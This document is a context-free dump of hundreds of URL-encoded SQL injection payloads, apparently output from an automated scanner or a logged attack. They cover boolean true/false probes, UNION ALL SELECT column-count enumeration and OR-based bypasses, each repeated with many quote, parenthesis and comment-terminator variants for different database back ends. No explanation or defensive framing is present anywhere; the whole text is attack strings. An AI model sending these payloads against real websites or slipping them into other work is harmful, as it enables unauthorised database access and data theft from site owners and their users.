-6453%27%2B%28SELECT%20%27ZuuQ%27%20WHERE%203071%3D3071%20UNION%20ALL%20SELECT%203071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071%2C3071--%20 -6763%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560%2C9560--%20 -3735%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125%2C3125--%20 -8206%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952%2C9952--%20 -9388%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140%2C8140--%20 -3241%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326%2C7326--%20 -1605%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142%2C6142--%20 -5570%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075%2C7075--%20 -9490%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833%2C3833--%20 -4947%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788%2C5788--%20 -9904%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622%2C3622--%20 1234.5%29%20AND%204359%3D1249 1234.5%29%20AND%205702%3D5702 1234.5%27%29%20AND%205288%3D8040 1234.5%27%29%20AND%205702%3D5702 1234.5%27%20AND%205694%3D1460 1234.5%27%20AND%205702%3D5702 1234.5%22%20AND%207624%3D3268 1234.5%22%20AND%205702%3D5702 1234.5%29%20AND%204442%3D1788%20AND%20%289295%3D9295 1234.5%29%20AND%205702%3D5702%20AND%20%283389%3D3389 1234.5%29%29%20AND%209143%3D9391%20AND%20%28%284252%3D4252 1234.5%29%29%20AND%205702%3D5702%20AND%20%28%289354%3D9354 1234.5%29%29%29%20AND%206451%3D1813%20AND%20%28%28%286919%3D6919 1234.5%29%29%29%20AND%205702%3D5702%20AND%20%28%28%284130%3D4130 1234.5%20AND%209471%3D9194 1234.5%20AND%205702%3D5702 1234.5%27%29%20AND%208985%3D8177%20AND%20%28%27QgCq%27%3D%27QgCq 1234.5%27%29%20AND%205702%3D5702%20AND%20%28%27JWAP%27%3D%27JWAP 1234.5%27%29%29%20AND%206047%3D9501%20AND%20%28%28%27nHXE%27%3D%27nHXE 1234.5%27%29%29%20AND%205702%3D5702%20AND%20%28%28%27cibl%27%3D%27cibl 1234.5%27%29%29%29%20AND%207393%3D2498%20AND%20%28%28%28%27wHQm%27%3D%27wHQm 1234.5%27%29%29%29%20AND%205702%3D5702%20AND%20%28%28%28%27cFAw%27%3D%27cFAw 1234.5%27%20AND%202865%3D3317%20AND%20%27DdgS%27%3D%27DdgS 1234.5%27%20AND%205702%3D5702%20AND%20%27aUWW%27%3D%27aUWW 1234.5%27%29%20AND%204510%3D2817%20AND%20%28%27oIvi%27%20LIKE%20%27oIvi 1234.5%27%29%20AND%205702%3D5702%20AND%20%28%27lzLN%27%20LIKE%20%27lzLN 1234.5%27%29%29%20AND%206570%3D9082%20AND%20%28%28%27CEyx%27%20LIKE%20%27CEyx 1234.5%27%29%29%20AND%205702%3D5702%20AND%20%28%28%27pbZK%27%20LIKE%20%27pbZK 1234.5%27%29%29%29%20AND%201845%3D8371%20AND%20%28%28%28%27TtOk%27%20LIKE%20%27TtOk 1234.5%27%29%29%29%20AND%205702%3D5702%20AND%20%28%28%28%27AOsT%27%20LIKE%20%27AOsT 1234.5%27%20AND%203580%3D2207%20AND%20%27aEMk%27%20LIKE%20%27aEMk 1234.5%27%20AND%205702%3D5702%20AND%20%27CpBi%27%20LIKE%20%27CpBi 1234.5%22%29%20AND%203420%3D8512%20AND%20%28%22IKwk%22%3D%22IKwk 1234.5%22%29%20AND%205702%3D5702%20AND%20%28%22WKmf%22%3D%22WKmf 1234.5%22%29%29%20AND%206870%3D5326%20AND%20%28%28%22SUbz%22%3D%22SUbz 1234.5%22%29%29%20AND%205702%3D5702%20AND%20%28%28%22uYyl%22%3D%22uYyl 1234.5%22%29%29%29%20AND%209602%3D4793%20AND%20%28%28%28%22zCzK%22%3D%22zCzK 1234.5%22%29%29%29%20AND%205702%3D5702%20AND%20%28%28%28%22Ypqx%22%3D%22Ypqx 1234.5%22%20AND%206546%3D1217%20AND%20%22lLHO%22%3D%22lLHO 1234.5%22%20AND%205702%3D5702%20AND%20%22nPXN%22%3D%22nPXN 1234.5%22%29%20AND%207783%3D3069%20AND%20%28%22OMZo%22%20LIKE%20%22OMZo 1234.5%22%29%20AND%205702%3D5702%20AND%20%28%22aLAk%22%20LIKE%20%22aLAk 1234.5%22%29%29%20AND%206795%3D7588%20AND%20%28%28%22rRdt%22%20LIKE%20%22rRdt 1234.5%22%29%29%20AND%205702%3D5702%20AND%20%28%28%22xVMD%22%20LIKE%20%22xVMD 1234.5%22%29%29%29%20AND%206610%3D9076%20AND%20%28%28%28%22GiIj%22%20LIKE%20%22GiIj 1234.5%22%29%29%29%20AND%205702%3D5702%20AND%20%28%28%28%22rmSb%22%20LIKE%20%22rmSb 1234.5%22%20AND%208872%3D6666%20AND%20%22YEME%22%20LIKE%20%22YEME 1234.5%22%20AND%205702%3D5702%20AND%20%22HXND%22%20LIKE%20%22HXND 1234.5%25%27%29%20AND%207061%3D3781%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%20AND%205702%3D5702%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%209906%3D6227%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%205702%3D5702%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%205305%3D3009%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%205702%3D5702%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%203535%3D7439%20AND%20%27%25%27%3D%27 1234.5%25%27%20AND%205702%3D5702%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%202319%3D6048%20AND%20%28%27xpOp%27%3D%27xpOp 1234.5%00%27%29%20AND%205702%3D5702%20AND%20%28%27lhlr%27%3D%27lhlr 1234.5%00%27%20AND%207876%3D8072%20AND%20%27xAZp%27%3D%27xAZp 1234.5%00%27%20AND%205702%3D5702%20AND%20%27qyAg%27%3D%27qyAg 1234.5%27%29%20WHERE%203765%3D3765%20AND%207946%3D8077%20--%20 1234.5%27%29%20WHERE%208238%3D8238%20AND%205702%3D5702%20--%20 1234.5%22%29%20WHERE%209270%3D9270%20AND%209475%3D3567%20--%20 1234.5%22%29%20WHERE%204959%3D4959%20AND%205702%3D5702%20--%20 1234.5%29%20WHERE%205744%3D5744%20AND%204077%3D5380%20--%20 1234.5%29%20WHERE%204459%3D4459%20AND%205702%3D5702%20--%20 1234.5%27%20WHERE%204209%3D4209%20AND%203538%3D4846%20--%20 1234.5%27%20WHERE%202033%3D2033%20AND%205702%3D5702%20--%20 1234.5%22%20WHERE%206686%3D6686%20AND%204824%3D1802%20--%20 1234.5%22%20WHERE%203118%3D3118%20AND%205702%3D5702%20--%20 1234.5%20WHERE%204622%3D4622%20AND%201805%3D7002%20--%20 1234.5%20WHERE%207340%3D7340%20AND%205702%3D5702%20--%20 1234.5%27%7C%7C%28SELECT%20%27kwhB%27%20FROM%20DUAL%20WHERE%207370%3D7370%20AND%209135%3D3977%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27cFHP%27%20FROM%20DUAL%20WHERE%201118%3D1118%20AND%205702%3D5702%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27Gafr%27%20WHERE%207047%3D7047%20AND%207694%3D9240%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27qRVM%27%20WHERE%209231%3D9231%20AND%205702%3D5702%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20QQAO%20WHERE%209802%3D9802%20AND%206201%3D2261%20%29%2B%27 1234.5%27%2B%28SELECT%20FTEp%20WHERE%209363%3D9363%20AND%205702%3D5702%20%29%2B%27 1234.5%27%2B%28SELECT%20%27YieI%27%20WHERE%201599%3D1599%20AND%204511%3D7354%20%29%2B%27 1234.5%27%2B%28SELECT%20%27ErRP%27%20WHERE%206207%3D6207%20AND%205702%3D5702%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%209491%3D8217%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%205702%3D5702%20%23 1234.5%29%20AND%206326%3D6255%23 1234.5%29%20AND%206529%3D6529%23 1234.5%27%29%20AND%206714%3D5177%23 1234.5%27%29%20AND%206529%3D6529%23 1234.5%27%20AND%208404%3D8517%23 1234.5%27%20AND%206529%3D6529%23 1234.5%22%20AND%208129%3D3445%23 1234.5%22%20AND%206529%3D6529%23 1234.5%29%20AND%202747%3D8809%23 1234.5%29%20AND%206529%3D6529%23 1234.5%29%29%20AND%201810%3D9489%23 1234.5%29%29%20AND%206529%3D6529%23 1234.5%29%29%29%20AND%209920%3D5460%23 1234.5%29%29%29%20AND%206529%3D6529%23 1234.5%20AND%207236%3D9203%23 1234.5%20AND%206529%3D6529%23 1234.5%27%29%20AND%202956%3D9165%23 1234.5%27%29%20AND%206529%3D6529%23 1234.5%27%29%29%20AND%207689%3D7823%23 1234.5%27%29%29%20AND%206529%3D6529%23 1234.5%27%29%29%29%20AND%208129%3D4811%23 1234.5%27%29%29%29%20AND%206529%3D6529%23 1234.5%27%20AND%206182%3D7796%23 1234.5%27%20AND%206529%3D6529%23 1234.5%27%29%20AND%203502%3D3813%23 1234.5%27%29%20AND%206529%3D6529%23 1234.5%27%29%29%20AND%201200%3D9602%23 1234.5%27%29%29%20AND%206529%3D6529%23 1234.5%27%29%29%29%20AND%202085%3D4927%23 1234.5%27%29%29%29%20AND%206529%3D6529%23 1234.5%27%20AND%207390%3D2747%23 1234.5%27%20AND%206529%3D6529%23 1234.5%22%29%20AND%205700%3D8135%23 1234.5%22%29%20AND%206529%3D6529%23 1234.5%22%29%29%20AND%206331%3D6003%23 1234.5%22%29%29%20AND%206529%3D6529%23 1234.5%22%29%29%29%20AND%205946%3D5824%23 1234.5%22%29%29%29%20AND%206529%3D6529%23 1234.5%22%20AND%203282%3D8386%23 1234.5%22%20AND%206529%3D6529%23 1234.5%22%29%20AND%205390%3D7343%23 1234.5%22%29%20AND%206529%3D6529%23 1234.5%22%29%29%20AND%204232%3D7495%23 1234.5%22%29%29%20AND%206529%3D6529%23 1234.5%22%29%29%29%20AND%204911%3D9062%23 1234.5%22%29%29%29%20AND%206529%3D6529%23 1234.5%22%20AND%202416%3D3359%23 1234.5%22%20AND%206529%3D6529%23 1234.5%25%27%29%20AND%209061%3D6073%23 1234.5%25%27%29%20AND%206529%3D6529%23 1234.5%25%27%29%29%20AND%204399%3D4492%23 1234.5%25%27%29%29%20AND%206529%3D6529%23 1234.5%25%27%29%29%29%20AND%203279%3D5916%23 1234.5%25%27%29%29%29%20AND%206529%3D6529%23 1234.5%25%27%20AND%204668%3D2674%23 1234.5%25%27%20AND%206529%3D6529%23 1234.5%00%27%29%20AND%206806%3D7631%23 1234.5%00%27%29%20AND%206529%3D6529%23 1234.5%00%27%20AND%201103%3D3329%23 1234.5%00%27%20AND%206529%3D6529%23 1234.5%27%29%20WHERE%209575%3D9575%20AND%209585%3D3112%23 1234.5%27%29%20WHERE%203965%3D3965%20AND%206529%3D6529%23 1234.5%22%29%20WHERE%204979%3D4979%20AND%208496%3D6737%23 1234.5%22%29%20WHERE%208033%3D8033%20AND%206529%3D6529%23 1234.5%29%20WHERE%203760%3D3760%20AND%202792%3D8023%23 1234.5%29%20WHERE%206984%3D6984%20AND%206529%3D6529%23 1234.5%27%20WHERE%208443%3D8443%20AND%204229%3D5056%23 1234.5%27%20WHERE%204885%3D4885%20AND%206529%3D6529%23 1234.5%22%20WHERE%208950%3D8950%20AND%205244%3D5896%23 1234.5%22%20WHERE%207600%3D7600%20AND%206529%3D6529%23 1234.5%20WHERE%206027%3D6027%20AND%207685%3D6044%23 1234.5%20WHERE%206424%3D6424%20AND%206529%3D6529%23 1234.5%27%7C%7C%28SELECT%20%27gUuQ%27%20FROM%20DUAL%20WHERE%209038%3D9038%20AND%208477%3D7711%23 1234.5%27%7C%7C%28SELECT%20%27gnVR%27%20FROM%20DUAL%20WHERE%203303%3D3303%20AND%206529%3D6529%23 1234.5%27%7C%7C%28SELECT%20%27fcLI%27%20WHERE%201540%3D1540%20AND%205233%3D5792%23 1234.5%27%7C%7C%28SELECT%20%27KKJX%27%20WHERE%207522%3D7522%20AND%206529%3D6529%23 1234.5%27%2B%28SELECT%20ybkz%20WHERE%208342%3D8342%20AND%207793%3D9390%23 1234.5%27%2B%28SELECT%20JevG%20WHERE%208666%3D8666%20AND%206529%3D6529%23 1234.5%27%2B%28SELECT%20%27bdFG%27%20WHERE%201412%3D1412%20AND%205212%3D8300%23 1234.5%27%2B%28SELECT%20%27BwjN%27%20WHERE%208908%3D8908%20AND%206529%3D6529%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%208860%3D9272%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%206529%3D6529%23 1234.5%29%20AND%209126%3D3690--%20 1234.5%29%20AND%207810%3D7810--%20 1234.5%27%29%20AND%209198%3D6427--%20 1234.5%27%29%20AND%207810%3D7810--%20 1234.5%27%20AND%203185%3D1794--%20 1234.5%27%20AND%207810%3D7810--%20 1234.5%22%20AND%202595%3D1506--%20 1234.5%22%20AND%207810%3D7810--%20 1234.5%29%20AND%209168%3D5632--%20 1234.5%29%20AND%207810%3D7810--%20 1234.5%29%29%20AND%202136%3D1403--%20 1234.5%29%29%20AND%207810%3D7810--%20 1234.5%29%29%29%20AND%203993%3D7613--%20 1234.5%29%29%29%20AND%207810%3D7810--%20 1234.5%20AND%203285%3D6207--%20 1234.5%20AND%207810%3D7810--%20 1234.5%27%29%20AND%207928%3D5551--%20 1234.5%27%29%20AND%207810%3D7810--%20 1234.5%27%29%29%20AND%204297%3D1000--%20 1234.5%27%29%29%20AND%207810%3D7810--%20 1234.5%27%29%29%29%20AND%205724%3D7215--%20 1234.5%27%29%29%29%20AND%207810%3D7810--%20 1234.5%27%20AND%208827%3D9388--%20 1234.5%27%20AND%207810%3D7810--%20 1234.5%27%29%20AND%201283%3D9306--%20 1234.5%27%29%20AND%207810%3D7810--%20 1234.5%27%29%29%20AND%202630%3D9383--%20 1234.5%27%29%29%20AND%207810%3D7810--%20 1234.5%27%29%29%29%20AND%201884%3D2755--%20 1234.5%27%29%29%29%20AND%207810%3D7810--%20 1234.5%27%20AND%203324%3D8593--%20 1234.5%27%20AND%207810%3D7810--%20 1234.5%22%29%20AND%203738%3D4133--%20 1234.5%22%29%20AND%207810%3D7810--%20 1234.5%22%29%29%20AND%201882%3D3909--%20 1234.5%22%29%29%20AND%207810%3D7810--%20 1234.5%22%29%29%29%20AND%209348%3D6301--%20 1234.5%22%29%29%29%20AND%207810%3D7810--%20 1234.5%22%20AND%204740%3D3117--%20 1234.5%22%20AND%207810%3D7810--%20 1234.5%22%29%20AND%202770%3D7469--%20 1234.5%22%29%20AND%207810%3D7810--%20 1234.5%22%29%29%20AND%203487%3D1289--%20 1234.5%22%29%29%20AND%207810%3D7810--%20 1234.5%22%29%29%29%20AND%204293%3D7042--%20 1234.5%22%29%29%29%20AND%207810%3D7810--%20 1234.5%22%20AND%205915%3D7302--%20 1234.5%22%20AND%207810%3D7810--%20 1234.5%25%27%29%20AND%206234%3D7544--%20 1234.5%25%27%29%20AND%207810%3D7810--%20 1234.5%25%27%29%29%20AND%209971%3D6155--%20 1234.5%25%27%29%29%20AND%207810%3D7810--%20 1234.5%25%27%29%29%29%20AND%202456%3D3476--%20 1234.5%25%27%29%29%29%20AND%207810%3D7810--%20 1234.5%25%27%20AND%204401%3D2366--%20 1234.5%25%27%20AND%207810%3D7810--%20 1234.5%00%27%29%20AND%201747%3D4074--%20 1234.5%00%27%29%20AND%207810%3D7810--%20 1234.5%00%27%20AND%205587%3D1820--%20 1234.5%00%27%20AND%207810%3D7810--%20 1234.5%27%29%20WHERE%201765%3D1765%20AND%206229%3D6698--%20 1234.5%27%29%20WHERE%205930%3D5930%20AND%207810%3D7810--%20 1234.5%22%29%20WHERE%205574%3D5574%20AND%207026%3D9213--%20 1234.5%22%29%20WHERE%209000%3D9000%20AND%207810%3D7810--%20 1234.5%29%20WHERE%203814%3D3814%20AND%207232%3D4328--%20 1234.5%29%20WHERE%203975%3D3975%20AND%207810%3D7810--%20 1234.5%27%20WHERE%206192%3D6192%20AND%204225%3D9657--%20 1234.5%27%20WHERE%208316%3D8316%20AND%207810%3D7810--%20 1234.5%22%20WHERE%201015%3D1015%20AND%202914%3D9940--%20 1234.5%22%20WHERE%208494%3D8494%20AND%207810%3D7810--%20 1234.5%20WHERE%204124%3D4124%20AND%202052%3D1945--%20 1234.5%20WHERE%203634%3D3634%20AND%207810%3D7810--%20 1234.5%27%7C%7C%28SELECT%20%27AWrq%27%20FROM%20DUAL%20WHERE%201410%3D1410%20AND%206765%3D4431--%20 1234.5%27%7C%7C%28SELECT%20%27Sqjk%27%20FROM%20DUAL%20WHERE%207038%3D7038%20AND%207810%3D7810--%20 1234.5%27%7C%7C%28SELECT%20%27RwBu%27%20WHERE%203990%3D3990%20AND%204831%3D7817--%20 1234.5%27%7C%7C%28SELECT%20%27thWm%27%20WHERE%202987%3D2987%20AND%207810%3D7810--%20 1234.5%27%2B%28SELECT%20ZrHU%20WHERE%207405%3D7405%20AND%209866%3D8601--%20 1234.5%27%2B%28SELECT%20skhZ%20WHERE%209651%3D9651%20AND%207810%3D7810--%20 1234.5%27%2B%28SELECT%20%27DxbV%27%20WHERE%209933%3D9933%20AND%203837%3D5192--%20 1234.5%27%2B%28SELECT%20%27JeOX%27%20WHERE%205274%3D5274%20AND%207810%3D7810--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%206057%3D4436--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%207810%3D7810--%20 -1572%29%20OR%20%289466%3D9229%29 -3363%29%20OR%20%288702%3D8702%29 -4858%29%20OR%20%288862%3D8501%29 -7071%27%29%20OR%20%281346%3D2336%29 -6080%27%29%20OR%20%288702%3D8702%29 -5127%27%29%20OR%20%284941%3D8848%29 -9677%27%20OR%20%281312%3D8017%29 -4955%27%20OR%20%288702%3D8702%29 -9863%27%20OR%20%281292%3D1872%29 -3566%22%20OR%20%281698%3D3189%29 -3789%22%20OR%20%288702%3D8702%29 -9649%22%20OR%20%287511%3D6385%29 -5239%29%20OR%20%286820%3D7040%29%20AND%20%283039%3D3039 -8652%29%20OR%20%288702%3D8702%29%20AND%20%284448%3D4448 -4051%29%20OR%20%284312%3D2723%29%20AND%20%288364%3D8364 -4355%29%29%20OR%20%286485%3D8633%29%20AND%20%28%285071%3D5071 -8748%29%29%20OR%20%288702%3D8702%29%20AND%20%28%288223%3D8223 -1307%29%29%20OR%20%285861%3D8841%29%20AND%20%28%285893%3D5893 -9261%29%29%29%20OR%20%288776%3D8840%29%20AND%20%28%28%282139%3D2139 -5740%29%29%29%20OR%20%288702%3D8702%29%20AND%20%28%28%282254%3D2254 -1977%29%29%29%20OR%20%284651%3D4124%29%20AND%20%28%28%284104%3D4104 -3532%20OR%20%282532%3D5250%29 -9943%20OR%20%288702%3D8702%29 -4102%20OR%20%289634%3D6302%29 -3346%27%29%20OR%20%289959%3D3319%29%20AND%20%28%27Zhqh%27%3D%27Zhqh -9550%27%29%20OR%20%288702%3D8702%29%20AND%20%28%27AONs%27%3D%27AONs -9581%27%29%20OR%20%285276%3D1946%29%20AND%20%28%27ssvk%27%3D%27ssvk -9499%27%29%29%20OR%20%286168%3D8351%29%20AND%20%28%28%27QgIg%27%3D%27QgIg -5642%27%29%29%20OR%20%288702%3D8702%29%20AND%20%28%28%27RPGf%27%3D%27RPGf -5037%27%29%29%20OR%20%284609%3D1707%29%20AND%20%28%28%27HyWV%27%3D%27HyWV -7982%27%29%29%29%20OR%20%286211%3D2438%29%20AND%20%28%28%28%27Puac%27%3D%27Puac -3989%27%29%29%29%20OR%20%288702%3D8702%29%20AND%20%28%28%28%27nfTE%27%3D%27nfTE -1432%27%29%29%29%20OR%20%285462%3D9744%29%20AND%20%28%28%28%27bDmi%27%3D%27bDmi -7647%27%20OR%20%288396%3D5836%29%20AND%20%27jXCV%27%3D%27jXCV -8379%27%20OR%20%288702%3D8702%29%20AND%20%27ovWa%27%3D%27ovWa -4420%27%20OR%20%282164%3D3282%29%20AND%20%27krtJ%27%3D%27krtJ -1134%27%29%20OR%20%287058%3D2489%29%20AND%20%28%27nLBV%27%20LIKE%20%27nLBV -5220%27%29%20OR%20%288702%3D8702%29%20AND%20%28%27TuQH%27%20LIKE%20%27TuQH -2146%27%29%20OR%20%282940%3D3870%29%20AND%20%28%27AFzo%27%20LIKE%20%27AFzo -8984%27%29%29%20OR%20%289313%3D4081%29%20AND%20%28%28%27YDXB%27%20LIKE%20%27YDXB -6212%27%29%29%20OR%20%288702%3D8702%29%20AND%20%28%28%27JREJ%27%20LIKE%20%27JREJ -5832%27%29%29%20OR%20%286886%3D9365%29%20AND%20%28%28%27cfQj%27%20LIKE%20%27cfQj -1617%27%29%29%29%20OR%20%289366%3D1152%29%20AND%20%28%28%28%27UHzn%27%20LIKE%20%27UHzn -3502%27%29%29%29%20OR%20%288702%3D8702%29%20AND%20%28%28%28%27sIoy%27%20LIKE%20%27sIoy -5309%27%29%29%29%20OR%20%286893%3D9057%29%20AND%20%28%28%28%27Sina%27%20LIKE%20%27Sina -3152%27%20OR%20%284915%3D9191%29%20AND%20%27JoPZ%27%20LIKE%20%27JoPZ -7899%27%20OR%20%288702%3D8702%29%20AND%20%27noZR%27%20LIKE%20%27noZR -8449%27%20OR%20%286432%3D4635%29%20AND%20%27AOAl%27%20LIKE%20%27AOAl -7854%22%29%20OR%20%288756%3D5320%29%20AND%20%28%22bnkj%22%3D%22bnkj -7357%22%29%20OR%20%288702%3D8702%29%20AND%20%28%22SqdT%22%3D%22SqdT -3170%22%29%20OR%20%288808%3D6206%29%20AND%20%28%22zimk%22%3D%22zimk -9439%22%29%29%20OR%20%285936%3D5579%29%20AND%20%28%28%22jYxP%22%3D%22jYxP -8366%22%29%29%20OR%20%288702%3D8702%29%20AND%20%28%28%22DJcU%22%3D%22DJcU -1460%22%29%29%20OR%20%285780%3D2403%29%20AND%20%28%28%22RSrr%22%3D%22RSrr -8000%22%29%29%29%20OR%20%285428%3D1080%29%20AND%20%28%28%28%22uvWC%22%3D%22uvWC -5062%22%29%29%29%20OR%20%288702%3D8702%29%20AND%20%28%28%28%22HNel%22%3D%22HNel -5797%22%29%29%29%20OR%20%285684%3D5114%29%20AND%20%28%28%28%22mjwD%22%3D%22mjwD -4585%22%20OR%20%282731%3D2861%29%20AND%20%22jNxi%22%3D%22jNxi -8920%22%20OR%20%288702%3D8702%29%20AND%20%22bGIT%22%3D%22bGIT -7936%22%20OR%20%284270%3D3678%29%20AND%20%22QgMR%22%3D%22QgMR -2019%22%29%20OR%20%282810%3D5345%29%20AND%20%28%22WqNt%22%20LIKE%20%22WqNt -2196%22%29%20OR%20%288702%3D8702%29%20AND%20%28%22NWUS%22%20LIKE%20%22NWUS -8230%22%29%20OR%20%282727%3D8939%29%20AND%20%28%22KUYA%22%20LIKE%20%22KUYA -8788%22%29%29%20OR%20%286038%3D9534%29%20AND%20%28%28%22RBzH%22%20LIKE%20%22RBzH -6575%22%29%29%20OR%20%288702%3D8702%29%20AND%20%28%28%22OiiC%22%20LIKE%20%22OiiC -5603%22%29%29%20OR%20%287778%3D2898%29%20AND%20%28%28%22tkFE%22%20LIKE%20%22tkFE -1931%22%29%29%29%20OR%20%288066%3D7961%29%20AND%20%28%28%28%22egIH%22%20LIKE%20%22egIH -8900%22%29%29%29%20OR%20%288702%3D8702%29%20AND%20%28%28%28%22CWKd%22%20LIKE%20%22CWKd -2731%22%29%29%29%20OR%20%288286%3D1360%29%20AND%20%28%28%28%22LSZw%22%20LIKE%20%22LSZw -7798%22%20OR%20%283304%3D8881%29%20AND%20%22Dfju%22%20LIKE%20%22Dfju -1823%22%20OR%20%288702%3D8702%29%20AND%20%22eLBc%22%20LIKE%20%22eLBc -2143%22%20OR%20%285055%3D5231%29%20AND%20%22eVqa%22%20LIKE%20%22eVqa -2369%25%27%29%20OR%20%281860%3D2503%29%20AND%20%28%27%25%27%3D%27 -4937%25%27%29%20OR%20%288702%3D8702%29%20AND%20%28%27%25%27%3D%27 -9894%25%27%29%20OR%20%287830%3D8532%29%20AND%20%28%27%25%27%3D%27 -5241%25%27%29%29%20OR%20%285445%3D9901%29%20AND%20%28%28%27%25%27%3D%27 -7215%25%27%29%29%20OR%20%288702%3D8702%29%20AND%20%28%28%27%25%27%3D%27 -9097%25%27%29%29%20OR%20%286770%3D4940%29%20AND%20%28%28%27%25%27%3D%27 